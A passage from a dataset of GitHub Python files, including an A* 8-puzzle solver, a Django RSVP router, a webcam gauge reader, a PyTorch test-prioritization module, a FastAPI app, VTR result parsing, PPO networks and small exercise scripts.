math.sqrt((xval - 1)**2 + (yval - 2)**2)\n elif state[i + j] == '8':\n h = h + math.sqrt((xval - 2)**2 + (yval - 2)**2)\n return h\n\n\n\n\n\ndef A_Star(initial_state, heuristic):\n g = 0\n if heuristic:\n heur = ManhattanDistance()\n else:\n heur = EuclideanDistance()\n\n goal = \"012345678\"\n frontier = PriorityQueue()\n f_frontier = set()\n explored = set()\n Parent_map = {initial_state: (initial_state, 0)}\n frontier.put((0+heur.distance(initial_state), initial_state))\n f_frontier.add(initial_state)\n maxDepth = 0\n while frontier.qsize() > 0:\n state = frontier.get()\n if state[1] in explored:\n continue\n f_frontier.remove(state[1])\n\n explored.add(state[1])\n if state[1] == goal:\n return Parent_map, len(explored), maxDepth\n\n neighbours = main.get_neighbors(state[1])\n\n for i in neighbours:\n if not (i in explored) and not (i in f_frontier):\n maxDepth = max(maxDepth,Parent_map[state[1]][1]+1)\n frontier.put((Parent_map[state[1]][1]+1+heur.distance(i), i))\n f_frontier.add(i)\n Parent_map[i] = (state[1], Parent_map[state[1]][1]+1)\n elif i in f_frontier:\n if (Parent_map[state[1]][1]+1) < Parent_map[i][1]:\n Parent_map[i] = (state[1], Parent_map[state[1]][1]+1)\n frontier.put((Parent_map[state[1]][1]+1+heur.distance(i), i))\n f_frontier.add(i)\n\n return False\n\n","repo_name":"Elbadry2025/Informed-and-Uninformed-Search-Algorithms-to-Solve-8-Puzzle","sub_path":"A_Star.py","file_name":"A_Star.py","file_ext":"py","file_size_in_byte":3589,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70560782888","text":"from django.conf.urls import patterns, url\n\nfrom rsvp import views\n\nurlpatterns = patterns('',\n # ex: /rsvp/\n url(r'^$', views.index, name='index'),\n # ex: /rsvp/5/\n # url(r'^(?P\\d+)/$', views.InviteReturnView.as_view(), name='invite_return'),\n # ex: /rsvp//\n url(r'^(?P[0-9a-z]+)/$', views.InviteReturnView.as_view(), name='invite_return'),\n # ex: /rsvp/search.json?q=Tom\n url(r'^search.json$', views.search, name='search'),\n # ex: /rsvp/thanks/\n url(r'^thanks', views.thanks, {'attending': True}, name='thanks'),\n)\n","repo_name":"haydngreatnews/engagement-party","sub_path":"rsvp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19635255473","text":"import cv2\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nclass webcam_gauge:\n \"\"\"webcam_gauge class\"\"\"\n pass\n def __init__(self, filename ='e16hbdstand.jpg')->None:\n self.filename = filename\n self.img = cv2.imread(filename)\n if self.img is None :\n print('Cannot read the file :{}'.format(filename))\n raise ValueError\n self.img_gray = cv2.cvtColor(self.img,cv2.COLOR_BGR2GRAY)\n self.img_rev = cv2.bitwise_not(self.img_gray)\n self.img_gauge = np.array([0])\n self.img_gauge_bin = np.array([0])\n\n def print(self):\n \"\"\"print itself\"\"\"\n print('filename: {}'.format(self.filename))\n\n def show_img(self):\n \"\"\"display the original figure.\"\"\"\n img_RGB = cv2.cvtColor(self.img,cv2.COLOR_BGR2RGB)\n plt.imshow(img_RGB)\n plt.show()\n\n def put_mask_circle(self,img,x1,y1,r):\n copied = img.copy()\n mask = np.zeros_like(copied)\n cv2.circle(mask,(x1,y1),r,color=(1,1,1),thickness=-1)\n copied = copied*mask\n return copied\n\n def calc_angle(self,x1,y1,x2,y2):\n if x2==x1 :\n return np.pi/2.\n else:\n angle = np.arctan((y2-y1)/(x2-x1))\n return angle\n def angle_range(self,gauge,angle):\n if gauge == 'A' or 
gauge == 'a':\n            if ( angle < np.pi/2./90.*10. ):\n                angle = angle - np.pi\n            if ( angle > np.pi/2./90*10. ):\n                angle = -np.pi*2+angle\n\n        elif gauge == 'B' or gauge == 'b':\n            if ( angle > np.pi/2./90*10.):\n                angle = angle -np.pi\n        return angle\n\n    def find_binary_threshold(self,img):\n        tmp = np.copy(img)\n        tmp_1dim = np.ravel(tmp)\n        tmp_sorted = np.sort(tmp_1dim)\n        thresh = tmp_sorted[len(tmp_sorted)-150]\n        return thresh\n\n    def read_gauge(self,gauge : str):\n        g = webcam_subgauge(gauge)\n        x1,y1 = g.get_center()\n        r = g.get_radius()\n        copied = self.put_mask_circle(self.img_rev,x1,y1,r)\n        self.img_gauge = copied[y1-r:y1+r,x1-r:x1+r]\n        thresh = self.find_binary_threshold(self.img_gauge)\n        ret, self.img_gauge_bin = cv2.threshold(\n            self.img_gauge,thresh,255,cv2.THRESH_BINARY)\n\n        lines = cv2.HoughLinesP(self.img_gauge_bin,rho=1,\n                                theta=np.pi/360,\n                                threshold = 10,\n                                minLineLength = 20,\n                                maxLineGap = 20)\n        for x1,y1,x2,y2 in lines[0]:\n            cv2.line(self.img_gauge_bin,(x1,y1),(x2,y2),color=(120,120,120),thickness =1)\n            angle = self.calc_angle(x1,y1,x2,y2)\n            angle2 = self.angle_range(gauge,angle)\n            print ('angle {:.5f} -> {:.5f}'.format(angle,angle2))\n            press = g.angle_pressure(angle2)\n            print ('pressure {:.2f}'.format(press))\n\n    def show_img_bin(self):\n        plt.imshow(self.img_gauge_bin)\n        plt.show()\n\n##################################################################\n#\n##################################################################\nclass webcam_subgauge:\n    \"\"\"webcam_subgauge stores information needed for image processing\"\"\"\n    def __init__(self, gauge : str):\n        if gauge == 'B' or gauge == \"b\" :\n            self.center = 171,109\n            self.radius = 16\n            self.ticks = -2.86, -2.04, -1.12, -0.31\n        elif gauge == \"A\" or gauge == 'a' :\n            self.center = 96,101\n            self.radius = 17\n            self.ticks = 1.55-2*np.pi, 2.61-2*np.pi, -2.65, -1.73\n        else:\n            print ('gauge identification invalid: {}'.format(gauge))\n            raise ValueError\n    def get_center(self):\n        return self.center\n\n    def get_radius(self):\n        return self.radius\n\n    def angle_pressure(self,angle):\n        p = [0,5,10,15]\n        if angle < self.ticks[0] or self.ticks[3] < angle:\n            return -1\n        return np.interp(angle,self.ticks,p)\n","repo_name":"kaz-aoki/webcam_ana","sub_path":"webcam.py","file_name":"webcam.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"894472052","text":"\ndef yes_no(question):\n    valid = False\n    while not valid:\n        response = input(question).lower()\n\n        if response == \"yes\" or response == \"y\":\n            response = \"yes\"\n            return response\n\n        elif response == \"no\" or response == \"n\":\n            response = \"no\"\n            return response\n\n        else:\n            print(\"Please answer yes / no\")\n\n\ndef instructions(question):\n    print(\"Here are the Instructions\")\n\n    helpneed = input(question).lower().strip()\n\n    if helpneed == \"yes\" or helpneed == \"y\":\n        print(\"That's ok here you go\")\n        instructions(question)\n\n    else:\n        print(\"Ok that good lets start the game\")\n\n\nmorehelp = instructions(\"are you ok with the rules? 
>>> Y/N\")\n\nshow_instructions = yes_no(\"Have you ever played this game before?\").lower().strip()\n\nif show_instructions == \"no\":\n instructions()\n\nelse:\n print(\"Well lets get you started then\")\n","repo_name":"JeckBleckburn/22_luckyunicorn","sub_path":"03_instructions1.py","file_name":"03_instructions1.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70454923687","text":"import sys\nfrom abc import abstractmethod\nfrom enum import Enum\nfrom itertools import chain\nfrom typing import Any, Dict, FrozenSet, Iterable, List, Optional, Tuple\n\nStringTuple = Tuple[str, ...]\n\n\n# Note: Keep the implementation of Relevance private to this file so\n# that it's easy to change in the future as we discover what's needed\nclass Relevance(Enum):\n HIGH = 0\n PROBABLE = 1\n UNRANKED = 2\n UNLIKELY = 3 # Not yet supported. Needs more infra to be usable\n NONE = 4 # Not yet supported. Needs more infra to be usable\n\n\nMETRIC_RELEVANCE_GROUP = \"relevance_group\"\nMETRIC_ORDER_WITHIN_RELEVANCE_GROUP = \"order_within_relevance_group\"\nMETRIC_NUM_TESTS_IN_RELEVANCE_GROUP = \"num_tests_in_relevance_group\"\nMETRIC_ORDER_OVERALL = \"order_overall\"\nMETRIC_HEURISTIC_NAME = \"heuristic_name\"\n\n\nclass TestPrioritizations:\n \"\"\"\n Describes the results of whether heuristics consider a test relevant or not.\n\n All the different ranks of tests are disjoint, meaning a test can only be in one category, and they are only\n declared at initization time.\n\n A list can be empty if a heuristic doesn't consider any tests to be in that category.\n\n Important: Lists of tests must always be returned in a deterministic order,\n otherwise it breaks the test sharding logic\n \"\"\"\n\n _test_priorities: List[StringTuple] # This list MUST be ordered by Relevance\n _original_tests: FrozenSet[str]\n\n def __init__(\n self,\n tests_being_ranked: Iterable[str], # The tests that are being prioritized.\n high_relevance: Optional[List[str]] = None,\n probable_relevance: Optional[List[str]] = None,\n unranked_relevance: Optional[List[str]] = None,\n unlikely_relevance: Optional[List[str]] = None,\n no_relevance: Optional[List[str]] = None,\n ) -> None:\n self._original_tests = frozenset(tests_being_ranked)\n\n self._test_priorities = [tuple() for _ in range(5)]\n\n self._test_priorities[Relevance.HIGH.value] = self.filter_out_extra_tests(\n high_relevance\n )\n self._test_priorities[Relevance.PROBABLE.value] = self.filter_out_extra_tests(\n probable_relevance\n )\n self._test_priorities[Relevance.UNRANKED.value] = self.filter_out_extra_tests(\n unranked_relevance\n )\n self._test_priorities[Relevance.UNLIKELY.value] = self.filter_out_extra_tests(\n unlikely_relevance\n )\n self._test_priorities[Relevance.NONE.value] = self.filter_out_extra_tests(\n no_relevance\n )\n\n # If any of the original tests were missed from the other lists, add them to the unranked_relevance list\n missing_tests = sorted(self._original_tests - set(self.get_all_tests()))\n self._test_priorities[Relevance.UNRANKED.value] = self._test_priorities[\n Relevance.UNRANKED.value\n ] + tuple(missing_tests)\n\n self.validate_test_priorities()\n\n def filter_out_extra_tests(\n self, relevance_group: Optional[List[str]]\n ) -> StringTuple:\n if not relevance_group:\n return tuple()\n return tuple(filter(lambda test: test in self._original_tests, relevance_group))\n\n def validate_test_priorities(self) -> None:\n # Ensure that the set of tests in 
    def validate_test_priorities(self) -> None:\n        # Ensure that the set of tests in the TestPrioritizations is identical to the set of tests passed in\n        assert self._original_tests == set(\n            self.get_all_tests()\n        ), \"The set of tests in the TestPrioritizations must be identical to the set of tests passed in\"\n\n    @staticmethod\n    def _merge_tests(\n        current_tests: Iterable[str],\n        new_tests: Iterable[str],\n        higher_pri_tests: Iterable[str],\n    ) -> StringTuple:\n        \"\"\"\n        We append all new tests to the current tests, while preserving the sorting on the new_tests\n        However, exclude any specified tests which have now moved to a higher priority list or tests\n        that weren't originally in the self's TestPrioritizations\n        \"\"\"\n        merged_tests = [\n            test\n            for test in chain(current_tests, new_tests)\n            if test not in higher_pri_tests\n        ] # skip the excluded tests\n        return tuple(dict.fromkeys(merged_tests)) # remove dupes while preserving order\n\n    def integrate_priorities(self, other: \"TestPrioritizations\") -> None:\n        \"\"\"\n        Integrates priorities from another TestPrioritizations object.\n\n        The final result takes all tests from the `self` and rearranges them based on priorities from `other`.\n        If there are tests mentioned in `other` which are not in `self`, those tests are ignored.\n        (For example, that can happen if a heuristic reports tests that are not run in the current job)\n        \"\"\"\n        assert (\n            self._original_tests == other._original_tests\n        ), \"Both tests should stem from the same original test list\"\n\n        higher_pri_tests: List[str] = []\n        for relevance, _ in enumerate(self._test_priorities):\n            self._test_priorities[relevance] = TestPrioritizations._merge_tests(\n                current_tests=self._test_priorities[relevance],\n                new_tests=other._test_priorities[relevance],\n                higher_pri_tests=higher_pri_tests,\n            )\n\n            # Don't let the tests we just added to the current relevance group be added to a lower relevance group\n            higher_pri_tests.extend(self._test_priorities[relevance])\n\n        self.validate_test_priorities()\n\n    def get_all_tests(self) -> StringTuple:\n        \"\"\"Returns all tests in the TestPrioritizations\"\"\"\n        return tuple(test for test in chain(*self._test_priorities))\n\n    def get_prioritized_tests(self) -> StringTuple:\n        return self.get_high_relevance_tests() + self.get_probable_relevance_tests()\n\n    def get_high_relevance_tests(self) -> StringTuple:\n        return tuple(test for test in self._test_priorities[Relevance.HIGH.value])\n\n    def get_probable_relevance_tests(self) -> StringTuple:\n        return tuple(test for test in self._test_priorities[Relevance.PROBABLE.value])\n\n    def get_unranked_relevance_tests(self) -> StringTuple:\n        return tuple(test for test in self._test_priorities[Relevance.UNRANKED.value])\n\n    def print_info(self) -> None:\n        def _print_tests(label: str, tests: StringTuple) -> None:\n            if not tests:\n                return\n\n            print(f\"{label} tests ({len(tests)}):\")\n            for test in tests:\n                print(f\"  {test}\")\n\n        for relevance_group, tests in enumerate(self._test_priorities):\n            _print_tests(f\"{Relevance(relevance_group).name.title()} Relevance\", tests)\n\n    def _get_test_relevance_group(self, test_name: str) -> Relevance:\n        \"\"\"Returns the priority of a test.\"\"\"\n        for relevance_group, tests in enumerate(self._test_priorities):\n            if test_name in tests:\n                return Relevance(relevance_group)\n\n        raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n
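    # Ordering sketch (added illustration): with groups [(\"a\",), (), (\"b\", \"c\"), (), ()],\n    # _get_test_order returns 0 for \"a\", 1 for \"b\" and 2 for \"c\" -- a test's rank is its\n    # index within its group plus the sizes of all higher-relevance groups before it.\n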
    def _get_test_order(self, test_name: str) -> int:\n        \"\"\"Returns the rank of the test specified by this heuristic.\"\"\"\n        base_rank = 0\n\n        for relevance_group_tests in self._test_priorities:\n            if test_name in relevance_group_tests:\n                return base_rank + relevance_group_tests.index(test_name)\n            base_rank += len(relevance_group_tests)\n\n        raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n    def _get_test_order_within_relevance_group(self, test_name: str) -> int:\n        for relevance_group_tests in self._test_priorities:\n            if test_name not in relevance_group_tests:\n                continue\n\n            return relevance_group_tests.index(test_name)\n\n        raise ValueError(f\"Test {test_name} not found in any relevance group\")\n\n    def get_priority_info_for_test(self, test_name: str) -> Dict[str, Any]:\n        \"\"\"Given a failing test, returns information about its prioritization that we want to emit in our metrics.\"\"\"\n        return {\n            METRIC_RELEVANCE_GROUP: self._get_test_relevance_group(test_name).name,\n            METRIC_ORDER_WITHIN_RELEVANCE_GROUP: self._get_test_order_within_relevance_group(\n                test_name\n            ),\n            METRIC_NUM_TESTS_IN_RELEVANCE_GROUP: len(\n                self._test_priorities[self._get_test_relevance_group(test_name).value]\n            ),\n            METRIC_ORDER_OVERALL: self._get_test_order(test_name),\n        }\n\n\nclass AggregatedHeuristics:\n    \"\"\"\n    Aggregates the results across all heuristics.\n\n    It saves the individual results from each heuristic and exposes an aggregated view.\n    \"\"\"\n\n    _heuristic_results: Dict[\n        str, TestPrioritizations\n    ] # Key is the Heuristic's name. Dicts will preserve the order of insertion, which is important for sharding\n\n    unranked_tests: Tuple[str, ...]\n\n    def __init__(self, unranked_tests: List[str]) -> None:\n        self.unranked_tests = tuple(unranked_tests)\n        self._heuristic_results = {}\n\n    def add_heuristic_results(\n        self, heuristic_name: str, heuristic_results: TestPrioritizations\n    ) -> None:\n        if heuristic_name in self._heuristic_results:\n            raise ValueError(f\"We already have heuristics for {heuristic_name}\")\n\n        self._heuristic_results[heuristic_name] = heuristic_results\n\n    def get_aggregated_priorities(self) -> TestPrioritizations:\n        \"\"\"\n        Returns the aggregated priorities across all heuristics.\n        \"\"\"\n        aggregated_priorities = TestPrioritizations(\n            tests_being_ranked=self.unranked_tests\n        )\n\n        for heuristic_results in self._heuristic_results.values():\n            aggregated_priorities.integrate_priorities(heuristic_results)\n\n        aggregated_priorities.print_info()\n\n        return aggregated_priorities\n\n    def get_test_stats(self, test: str) -> Dict[str, Any]:\n        \"\"\"\n        Returns the aggregated statistics for a given test.\n        \"\"\"\n        stats: Dict[str, Any] = {\n            \"test_name\": test,\n        }\n\n        # Get baseline metrics assuming we didn't have any TD heuristics\n        baseline_priorities = TestPrioritizations(\n            tests_being_ranked=self.unranked_tests\n        )\n        baseline_stats = baseline_priorities.get_priority_info_for_test(test)\n        baseline_stats[\"heuristic_name\"] = \"baseline\"\n        stats[\"without_heuristics\"] = baseline_stats\n\n        # Get metrics about the heuristics used\n        heuristics = []\n\n        # Figure out which heuristic gave this test the highest priority (if any)\n        highest_ranking_heuristic = None\n        highest_ranking_heuristic_order: int = sys.maxsize\n\n        # And figure out how many heuristics suggested prioritizing this test\n        num_heuristics_prioritized_by = 0\n\n        for heuristic_name, heuristic_results in self._heuristic_results.items():\n            metrics = heuristic_results.get_priority_info_for_test(test)\n            metrics[\"heuristic_name\"] = heuristic_name\n            heuristics.append(metrics)\n\n            if heuristic_results._get_test_relevance_group(test) in [\n                Relevance.HIGH,\n                Relevance.PROBABLE,\n            ]:\n                num_heuristics_prioritized_by += 1\n\n                # \"highest_ranking_heuristic\" should only consider heuristics that actually prioritize the test.\n                # Sometimes an UNRANKED heuristic could have an overall order above a PRIORITIZED heuristic\n                # because it was randomly sorted higher initially, while the heuristic that actually prioritized it\n                # used other data to determine it to be slightly less relevant than other tests.\n                if metrics[METRIC_ORDER_OVERALL] < highest_ranking_heuristic_order:\n                    highest_ranking_heuristic = heuristic_name\n                    highest_ranking_heuristic_order = metrics[METRIC_ORDER_OVERALL]\n\n        stats[\"heuristics\"] = heuristics\n\n        # Easier to compute here than in rockset\n        stats[\"num_heuristics_prioritized_by\"] = num_heuristics_prioritized_by\n\n        stats[\n            \"aggregated\"\n        ] = self.get_aggregated_priorities().get_priority_info_for_test(test)\n\n        if highest_ranking_heuristic:\n            stats[\"highest_ranking_heuristic\"] = highest_ranking_heuristic\n\n        return stats\n\n\nclass HeuristicInterface:\n    \"\"\"\n    Interface for all heuristics.\n    \"\"\"\n\n    name: str\n    description: str\n\n    @abstractmethod\n    def __init__(self, **kwargs: Dict[str, Any]) -> None:\n        pass\n\n    @abstractmethod\n    def get_test_priorities(self, tests: List[str]) -> TestPrioritizations:\n        \"\"\"\n        Returns the prioritizations for the given tests.\n\n        The set of test in TestPrioritizations _must_ be identical to the set of tests passed in.\n        \"\"\"\n        pass\n\n    def __str__(self) -> str:\n        return self.__class__.__name__\n","repo_name":"amd/ZenDNN-pytorch","sub_path":"tools/testing/target_determination/heuristics/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":13025,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} {"seq_id":"16164404999","text":"from fastapi.middleware.cors import CORSMiddleware\nfrom starlette.requests import Request\nfrom fastapi import Depends, FastAPI\nfrom sqlalchemy.orm import Session\nfrom core_fun.auth import get_current_active_user\n\nfrom orm.session import get_db\nfrom orm.session import SessionLocal\nfrom orm.utils_ORM import get_user\nfrom api_routes.routers.auth import auth_router\nfrom api_routes.routers.pois import pois_router \nfrom api_routes.routers.sois import sois_router\nfrom api_routes.routers.aois import aois_router\nfrom api_routes.routers.lois import lois_router \nimport uvicorn\n# from api.routers.projects import project_router\n# from api.routers.ingredients import ingredient_router\n# from api.routers.items import item_router\n# from api.routers.menus import menu_router\n# from api.routers.orders import order_router\n# from api.routers.ratings import rating_router\n\n# from core.auth import get_current_active_user\n# from app.db.server import create_project, add_project_to_user, get_user\n# from app.core.auth import get_current_active_leader, get_current_active_user\n\n\napp = FastAPI(docs_url=\"/api/docs\", openapi_url=\"/api\")\n\norigins = [\n    \"http://localhost:3000\",\n    \"http://localhost:3000/api\",\n    \"http://localhost:3000/api/v1\",\n    \"http://localhost:19000\",\n    \"http://10.0.2.2:19000\",\n    \"http://10.0.2.2:5554\",\n    \"http://192.168.56.1:19000\",\n    \"http://192.168.56.1:5554\",\n]\napp.add_middleware(\n    CORSMiddleware,\n    allow_origins=origins,\n    allow_credentials=True,\n    allow_methods=[\"*\"],\n    allow_headers=[\"*\"],\n)\n\n\n@app.middleware(\"http\")\nasync def db_session_middleware(request: Request, call_next):\n    request.state.db = SessionLocal()\n    response = await call_next(request)\n    request.state.db.close()\n    return response\n
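\n# Hedged aside (added, not part of the original app): wrapping the session\n# teardown in try/finally would also release it when a route raises:\n#     try:\n#         response = await call_next(request)\n#     finally:\n#         request.state.db.close()\n#     return response\n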
\n\n@app.get(\"/{id}\")\ndef get_by_id(id: int, db: Session = Depends(get_db)):\n\n    print(\"here\", id)\n    user1 = get_user(db, id)\n    return user1.email\n\n\n@app.get(\"/api/v1\")\nasync def root():\n    return {\"message\": \"Hello World\"}\n\n\n# Routers\n\napp.include_router(\n    pois_router,\n    prefix=\"/api/v1\",\n    tags=[\"pois\"],\n    dependencies=[Depends(get_current_active_user)],\n    )\napp.include_router( \n    sois_router,\n    prefix=\"/api/v1\",\n    tags=[\"sois\"],\n    dependencies=[Depends(get_current_active_user)],\n    )\napp.include_router(\n    aois_router,\n    prefix=\"/api/v1\",\n    tags=[\"aois\"],\n    dependencies=[Depends(get_current_active_user)],\n    )\n\napp.include_router(\n    lois_router,\n    prefix=\"/api/v1\",\n    tags=[\"lois\"],\n    dependencies=[Depends(get_current_active_user)],\n    )\n\napp.include_router(auth_router, prefix=\"/api\", tags=[\"auth\"])\n\n\nif __name__ == \"__main__\":\n    uvicorn.run(\"main:app\", host=\"0.0.0.0\", port=8000, reload=True)\n\n","repo_name":"camzero94/APP_DEH_2023","sub_path":"backend/my_app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"5378903806","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom linked_list.list_node import ListNode\nfrom linked_list.twonumbers import TwoNumbers\n\nclass TestTwoNumbers(unittest.TestCase):\n    def setUp(self):\n        self.func = TwoNumbers()\n\n    def test_1(self):\n        '''\n        Input: (2 -> 4 -> 3) + (5 -> 6 -> 4)\n        Output: 7 -> 0 -> 8 --- 342 + 465 = 807\n        '''\n        a = ListNode(2)\n        a.next = ListNode(4)\n        a.next.next = ListNode(3)\n        b = ListNode(5)\n        b.next = ListNode(6)\n        b.next.next = ListNode(4)\n        head = self.func.addTwoNumbers(a, b)\n        cur, result = head, ''\n        while cur:\n            result = str(cur.val) + result\n            cur = cur.next\n        self.assertEqual(result, \"807\")\n\n    def test_2(self):\n        a = ListNode(9)\n        a.next = ListNode(8)\n        b = ListNode(1)\n        head = self.func.addTwoNumbers(a, b)\n        cur, result = head, ''\n        while cur:\n            result = str(cur.val) + result\n            cur = cur.next\n        self.assertEqual(result, \"90\")\n\n\nif __name__ == '__main__':\n    unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/linked_list_test/test_twonumbers.py","file_name":"test_twonumbers.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"74144769449","text":"# [389] Find the Difference\n\n# https://leetcode-cn.com/problems/find-the-difference/description/\n\n# * algorithms\n# * Easy (64.19%)\n# * Total Accepted: 55.1K\n# * Total Submissions: 81.9K\n# * Testcase Example: '\"abcd\"\\n\"abcde\"'\n\n# Given two strings s and t, each containing only lowercase letters.\n\n# String t is generated by randomly shuffling string s and then adding one letter at a random position.\n\n# Find the letter that was added to t.\n\n#\n\n# Example 1:\n\n# Input: s = \"abcd\", t = \"abcde\"\n# Output: \"e\"\n# Explanation: 'e' is the letter that was added.\n\n\n# Example 2:\n\n# Input: s = \"\", t = \"y\"\n# Output: \"y\"\n\n\n# Example 3:\n\n# Input: s = \"a\", t = \"aa\"\n# Output: \"a\"\n\n\n# Example 4:\n\n# Input: s = \"ae\", t = \"aea\"\n# Output: \"a\"\n\n\n#\n\n# Constraints:\n\n\n# \t0 <= s.length <= 1000\n# \tt.length == s.length + 1\n# \ts and t contain only lowercase letters\n\n\nclass Solution(object):\n    def findTheDifference0(self, s, t):\n        \"\"\"\n        :type s: str\n        :type t: str\n        :rtype: str\n        \"\"\"\n        sum_s = sum_t = 0\n        for c in s:\n            sum_s += ord(c)\n        for c in t:\n            sum_t += ord(c)\n        return chr(sum_t - sum_s)\n\n
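    # Added explanation (comments only): the XOR solution below relies on\n    # x ^ x == 0 and x ^ 0 == x, so XOR-ing the char codes of both strings\n    # cancels every paired character and leaves only the added one, e.g. for\n    # s = \"ab\", t = \"aba\" everything collapses to ord('a').\n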
    def findTheDifference(self, s, t):\n        ans = ord(t[-1])\n        for i in range(len(s)):\n            ans ^= ord(s[i])\n            ans ^= ord(t[i])\n        return chr(ans)\n","repo_name":"hedeqiang/leetcode-1","sub_path":"python/389.find-the-difference.py","file_name":"389.find-the-difference.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"3923167264","text":"#!/usr/bin/env python3\n\"\"\"\nModule to parse the vtr flow results.\n\"\"\"\nimport sys\nfrom pathlib import Path\nimport glob\nfrom collections import OrderedDict\n\n# pylint: disable=wrong-import-position\nsys.path.insert(0, str(Path(__file__).resolve().parent.parent))\nimport vtr\nfrom vtr import paths\n\n# pylint: enable=wrong-import-position\n\n\ndef parse_vtr_flow(arg_list):\n    \"\"\"\n    parse vtr flow output\n    \"\"\"\n    parse_path = arg_list[0]\n    parse_config_file = arg_list[1]\n    parse_config_file = vtr.util.verify_file(parse_config_file, \"parse config\")\n\n    extra_params = arg_list[2:]\n    if parse_config_file is None:\n        parse_config_file = str(paths.vtr_benchmarks_parse_path)\n\n    parse_patterns = vtr.load_parse_patterns(str(parse_config_file))\n\n    metrics = OrderedDict()\n\n    extra_params_parsed = OrderedDict()\n\n    for param in extra_params:\n        key, value = param.split(\"=\", 1)\n        extra_params_parsed[key] = value\n        print(key, end=\"\\t\")\n\n    # Set defaults\n    for parse_pattern in parse_patterns.values():\n        metrics[parse_pattern.name()] = (\n            parse_pattern.default_value() if parse_pattern.default_value() is not None else \"\"\n        )\n        print(parse_pattern.name(), end=\"\\t\")\n    print(\"\")\n\n    for key, value in extra_params_parsed.items():\n        print(value, end=\"\\t\")\n\n    # Process each pattern\n    for parse_pattern in parse_patterns.values():\n\n        # We interpret the parse pattern's filename as a glob pattern\n        filepaths = glob.glob(str(Path(parse_path) / parse_pattern.filename()))\n\n        if len(filepaths) > 1:\n            raise vtr.InspectError(\n                \"File pattern '{}' is ambiguous ({} files matched)\".format(\n                    parse_pattern.filename(), len(filepaths)\n                ),\n                len(filepaths),\n                filepaths,\n            )\n\n        if len(filepaths) == 1:\n\n            assert Path(filepaths[0]).exists()\n            metrics[parse_pattern.name()] = \"-1\"\n            with open(filepaths[0], \"r\") as file:\n                for line in file:\n                    while line[0] == \"#\":\n                        line = line[1:]\n                    match = parse_pattern.regex().match(line)\n                    if match and match.groups():\n                        # Extract the first group value\n                        metrics[parse_pattern.name()] = match.groups()[0]\n            print(metrics[parse_pattern.name()], end=\"\\t\")\n        else:\n            # No matching file, skip\n            print(\"-1\", end=\"\\t\")\n            assert len(filepaths) == 0\n    print(\"\")\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    parse_vtr_flow(sys.argv[1:])\n","repo_name":"aaryangupta/pygmy-dev","sub_path":"tools/vtr-verilog-to-routing/vtr_flow/scripts/python_libs/vtr/parse_vtr_flow.py","file_name":"parse_vtr_flow.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} {"seq_id":"27124971403","text":"import numpy as np\nimport torch\nimport torch.nn as nn\n\nfrom dr.ppo.utils import weights_init\n\n\nclass Policy(nn.Module):\n\n    def __init__(self, ob_space, ac_space, hid_size, pol_init_std):\n        super().__init__()\n\n        self.l_in = nn.Linear(ob_space.shape[0], hid_size)\n        self.l1 = nn.Linear(hid_size, hid_size)\n        self.l_out = nn.Linear(hid_size, ac_space.shape[0])\n\n        self.std = nn.Parameter(torch.tensor([[pol_init_std] * ac_space.shape[0]], dtype=torch.float32))\n\n        for name, c in self.named_children():\n            if name == 'l_out':\n                
weights_init(c, 0.01)\n else:\n weights_init(c, 1.0)\n\n def forward(self, x):\n\n x = torch.tanh(self.l_in(x))\n x = torch.tanh(self.l1(x))\n mean = self.l_out(x)\n\n ac = torch.normal(mean, self.std.expand(mean.shape[0], -1))\n\n return ac, mean\n\n def neglogp(self, states, acs):\n\n _, mean = self.forward(states)\n\n ac_size = acs.size()[-1]\n\n return 0.5 * torch.sum(((acs - mean) / self.std) ** 2, dim=-1, keepdim=True) + \\\n 0.5 * np.log(2.0 * np.pi) * float(ac_size) + \\\n torch.sum(torch.log(self.std), dim=-1)\n\n def logp(self, state, ac):\n return - self.neglogp(state, ac)\n\n def prob(self, state, ac):\n return torch.exp(self.logp(state, ac))\n\n\nclass ValueNet(nn.Module):\n\n def __init__(self, ob_space, hid_size):\n super().__init__()\n\n self.l_in = nn.Linear(ob_space.shape[0], hid_size)\n self.l1 = nn.Linear(hid_size, hid_size)\n self.l_out = nn.Linear(hid_size, 1)\n\n for c in self.children():\n weights_init(c, 1.0)\n\n def forward(self, x):\n x = torch.tanh(self.l_in(x))\n x = torch.tanh(self.l1(x))\n x = self.l_out(x)\n\n return x\n","repo_name":"quanvuong/domain_randomization","sub_path":"dr/ppo/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"25150506021","text":"class Player:\n def __init__(self, canvas_player, board, displayWin_function, one_tile_size):\n self.player = canvas_player\n self.x = board.start_position[0]\n self.y = board.start_position[1]\n self.maze = board.maze\n self.field_size = board.field_size\n self.canvas = board.canvas\n self.one_tile_size = one_tile_size\n self.displayWin = displayWin_function\n self.target = board.end_position\n\n self.won = False\n\n def move(self, dx, dy):\n new_x = self.x + dx\n new_y = self.y + dy\n\n if self.won:\n return\n\n if new_x < 0 or new_x 